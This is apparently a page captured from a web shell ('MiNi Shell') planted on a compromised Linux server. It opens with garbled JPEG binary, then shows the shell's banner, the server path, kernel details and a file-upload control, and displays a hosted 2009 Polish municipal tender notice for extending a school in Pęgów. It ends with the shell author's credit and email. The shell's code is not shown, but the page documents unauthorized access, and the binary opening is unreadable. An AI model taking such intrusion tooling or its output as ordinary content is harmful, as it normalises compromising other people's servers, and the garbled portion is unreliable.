JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090406/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090406/58787-N-2009.html

<p class="kh_header"><b>Oborniki Śląskie: Przebudowa Publicznego Gimnazjum w Pęgowie gm. Oborniki Śląskie</b><br>
<b>Numer ogłoszenia: 58787 - 2009; data zamieszczenia: 06.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina  Oborniki Śląskie , ul. Trzebnicka 1, 55-120 Oborniki Śląskie, woj. dolnośląskie, tel. 071 3103519, 3103536, faks 071 3102295.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.oborniki-slaskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa Publicznego Gimnazjum w Pęgowie gm. Oborniki Śląskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem postępowania jest realizacja budynku Publicznego Gimnazjum w Pęgowie, będącego rozbudową istniejącego budynku Szkoły Podstawowej im. Adama Mickiewicza. W zakres zadania wchodzi ponadto rozbudowa z częściową przebudową istniejącej sali gimnastycznej o zespół pomieszczeń towarzyszących. 
   Zgodnie z Uchwałą Rady Miejskiej w Obornikach Śląskich z dnia 28.09.2006, przewiduje się utworzenie po zakończeniu przedmiotowej inwestycji Zespołu Szkół, ze wspólną salą gimnastyczną (istniejącą) i biblioteką (w budynku projektowanym).
   Teren lokalizacji jest objęty miejscowym planem zagospodarowania przestrzennego, który określa podstawowe parametry projektowanej zabudowy.

Podstawowe dane liczbowe:
- kubatura całkowita rozbudowy  7823,9  m3
- powierzchnia zabudowy gimnazjum  765,0  m2
- powierzchnia zabudowy zaplecza sali 269,5  m2
- łączna powierzchnia zabudowy projektowanych obiektów 1034,5  m2
- powierzchnia netto projektowanych budynków  1743,44 m2
- przewidywana maksymalna ilość uczniów gimnazjum  240
- ilość kondygnacji nadziemnych  3

Program użytkowy i rozwiązania architektoniczne:
           Zaprojektowano trzykondygnacyjny budynek na planie litery L, przykryty dachem dwuspadkowym o nachyleniu 70% jak na budynku istniejącym. Fragment budynku w strefie wejściowej, a także zaplecze sali gimnastycznej zaprojektowano jako jednokondygnacyjne, przykryte dachem płaskim. Obiekt połączono z istniejącym budynkiem dwukondygnacyjnym łącznikiem przykrytym dachem płaskim. 

   W parterze zlokalizowano szatnię, świetlicę, pomieszczenia administracji, bibliotekę i pomieszczenia dydaktyczne. Salę zajęć technicznych oddzielono wraz z szatnią jako strefę głośną w budynku. Na piętrze i poddaszu zlokalizowano większość pomieszczeń dydaktycznych. Pomieszczenia higieniczno- sanitarne zgrupowano przy północnej fasadzie budynku na wszystkich kondygnacjach.

   Budynek projektowany połączono z istniejącym: w parterze- przejściem komunikacyjnym, oraz na piętrze- wspólnym pokojem nauczycielskim. 

   Po zakończeniu inwestycji założono (zgodnie z decyzją Inwestora) funkcjonowanie całości jako Zespołu Szkół, ze wspólnym wykorzystaniem Sali gimnastycznej w części istniejącej, oraz biblioteki- w części projektowanej.

   Forma architektoniczna zachowuje cechy współczesnej architektury, nawiązując równocześnie do istniejącego budynku szkoły podstawowej. 
   Przewidziano zastosowanie podobnych materiałów, wykończeń elewacji jak w pozostałych- istniejących budynkach przeprojektowanego zespołu:
- pokrycie dachu blachodachówką w kolorze ciemnoczerwonym, identyczną jak na budynkach istniejących
- na fragmentach elewacji- cegła i płytki klinkierowe w kolorze identycznym jak na budynku istniejącym
- tynki zewnętrzne malowane na kolory pastelowe
- okna drewniane, lub PVC w kolorze ciemnym- drewnopodobnym.
- ścianki szklane o konstrukcji aluminiowej malowanej na kolor ciemnoszary

Przyjęte rozwiązania materiałowe:
          Ściany zewnętrzne warstwowe murowane z cegły pełnej grub. 25cm, lub z bloczków o gr. 24,0cm, oraz żelbetowe wylewane (w części fundamentowej) grubości 25cm, docieplone styropianem i wykończone tynkiem na siatce metodą lekką-mokrą wg instrukcji wybranego systemu, lub wykończone cegłą klinkierową. Ściany wewnętrzne nośne murowane z cegły pełnej grub. 25cm, lub z bloczków o grubości 24cm.
   Ściany działowe murowane z bloczków gazobetonowych, lub z cegły dziurawki grubości 12 lub 8 cm, albo lekkie- wykonywane z płyty GK 12,5mm na stelażu stalowym z profili 100mm.

   Stropy prefabrykowane systemu TERIVA II i TERIVA III.

   Okna w obiekcie będą wykonane z wysokiej klasy profili PCV i szklone zestawem termoizolacyjnym o k=1.1W/m2K, wyposażone w nawietrzaki z regulacją montowane w świetle ościeży. Parapety okienne wewnętrzne będą wykonane jako systemowe dostarczane razem z oknami. Parapety zewnętrzne będą wykonane jako blaszane z blachy ocynkowanej powlekanej, parapety wewnętrzne granitowe o gr. 4cm.
   Przeszklenie ściany szklanej będzie wykonane na profilach aluminiowych wysokiej jakości.

   Do większości pomieszczeń będą zastosowane drzwi stalowe- drewnopodobne.
   Na powierzchniach komunikacyjnych i w pomieszczeniach higieniczno-sanitarnych przewiduje się ułożenie wysokiej jakości płytek gresowych odpornych na zabrudzenia wgłębne o wymiarach 30/30 w odcieniach szarości. Na schodach i pochylniach płytki schodowe w innym kolorze.
   W pomieszczeniach dydaktycznych przewidziano posadzkę z PVC.

   Dach o konstrukcji drewnianej, kryty blachodachówką na łatach. Przestrzeń pod pokryciem wentylowana otworami w okapie i kalenicy, oraz w razie potrzeby w połaci dachu.
Nad pomieszczeniem dydaktycznym drugiej kondygnacji stropodach wentylowany dwudzielny, z warstwą górną o konstrukcji z płyt korytkowych, ocieplony wełną mineralną, kryty papą polimerową termozgrzewalną.
Stropodachy lekkie: niewentylowane, , o konstrukcji z blachy stalowej trapezowej na belkach stalowych, ocieplony wełną mineralną, kryty papą polimerową termozgrzewalną.

Stan istniejący zagospodarowania terenu:
Planowana inwestycja zlokalizowana jest w Pęgowie, na działce nr 14/3 AM-1 w obrębie Pęgów, przy ul. Głównej 101. Na działce przeznaczonej pod budowę gimnazjum znajduje się obecnie budynek Szkoły Podstawowej. Jest to trzykondygnacyjny budynek z poddaszem użytkowym na planie prostokąta, z parterową salą gimnastyczną dobudowaną po stronie północnej.
   Teren lokalizacji jest płaski z lekkim nachyleniem, o rzędnych wysokościowych od ok. 135,5m n.p.m. w części południowej do ok. 137,5m n.p.m. w części północnej. W obrębie działki występują liczne elementy zieleni wysokiej.
   Od strony południowej teren lokalizacji sąsiaduje z istniejącym budynkiem przedszkola. Od strony południowo- zachodniej i zachodniej z terenami zielonymi (w tym strefa ochronna cmentarza). Od strony północnej z istniejącym boiskiem szkolnym. Od strony wschodniej przebiega ulica Główna- droga nr 342, od której istnieje dojście i dojazd do posesji.
   W chwili obecnej teren przeznaczony pod lokalizację jest uzbrojony w media: sieci wodną, elektroenergetyczną, oraz kanalizacji sanitarnej i deszczowej.
   W związku z planowaną inwestycją niezbędne będą zmiany w usytuowaniu niektórych elementów uzbrojenia terenu: w tym sieci wodnej i kanalizacyjnej. Należy je wykonać na podstawie części instalacyjnej projektu.

   Dokładny zakres przedmiotu zamówienia określa załączony do SIWZ przedmiar robót oraz projekt budowlano-wykonawczy.
   Zamawiający żąda, przed złożeniem oferty,  wizji lokalnej w terenie objętym przedmiotem zamówienia. Wykonanie tego żądania wykonawcy potwierdzą stosownym oświadczeniem będącym załącznikiem do oferty.
   Roboty muszą być wykonane zgodnie z posiadaną przez zamawiającego dokumentacją projektową opatrzoną stosownym pozwoleniem na budowę, specyfikacją techniczną wykonania i odbioru robót budowlanych oraz obowiązującymi normami technicznymi i prawnymi.
   Zamawiający będzie żądał zastosowania do realizacji zamówienia materiałów w gatunku I opatrzonych niezbędnymi świadectwami i dopuszczeniami do stosowania. Dokumenty dotyczące zastosowanych materiałów wykonawca będzie obowiązany przekazywać zamawiającemu przed ich wbudowaniem. 
   Odbiór końcowy przedmiotu zamówienia musi być opatrzony niezbędnymi zaświadczeniami, protokołami, dopuszczeniami do użytkowania oraz dokumentacją geodezyjną powykonawczą.
   Koszty uzyskania wszystkich zezwoleń, zaświadczeń, obsługi geodezyjnej i innych niezbędnych opracowań pozostają po stronie wykonawcy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.42.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Oferta musi być zabezpieczona wadium w wysokości: 75 000.00 PLN (słownie:  siedemdziesiąt pięć tysięcy 00/100 PLN)
2. Wadium należy wnieść  w terminie do dnia 2009-04-27 do godz. 09:55.
3. Wadium może być wnoszone w jednej lub kilku następujących formach:
a) pieniądzu:
przelewem na rachunek bankowy Zamawiającego: Bank Spółdzielczy w Obornikach Śląskich 83 95830009 0000 1007 2000 0017,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych;
d) gwarancjach ubezpieczeniowych
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
W przypadku wniesienia wadium w formach wskazanych w punktach b, c, d, e, oryginały dokumentów zdeponować w kasie Urzędu Miejskiego w Obornikach Śląskich, a potwierdzone za zgodność z oryginałem ich kopie dołączyć do oferty.
Kasa w Urzędzie Miejskim w Obornikach Śląskich jest czynna w godzinach:
- od poniedziałku do piątku z wyjątkiem środy - od 09:00 do 12:00;
- w środę - od 12:00 do 15:00.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1) Sytuacja podmiotowa wykonawcy
Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych.
2) Zdolność ekonomiczna i finansowa
Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
3) Zdolność techniczna
Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1) Dokument potwierdzający złożenie wymaganego wadium.
2) Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
3) Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
4) Polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
5) Dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
6) Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie.
7) Oświadczenie z art.22 i art.24 ustawy Prawo zamówień publicznych..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://oborniki-slaskie.ibip.wroc.pl/public/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Obornikach Śląskich, pok. nr 09
ul. Trzebnicka 1
55-120 Oborniki Śląskie.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2009 godzina 09:55, miejsce: Urząd Miejski w Obornikach Śląskich, pok. nr 6A - Punkt obsługi interesantów
ul. Trzebnicka 1
55-120 Oborniki Śląskie.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com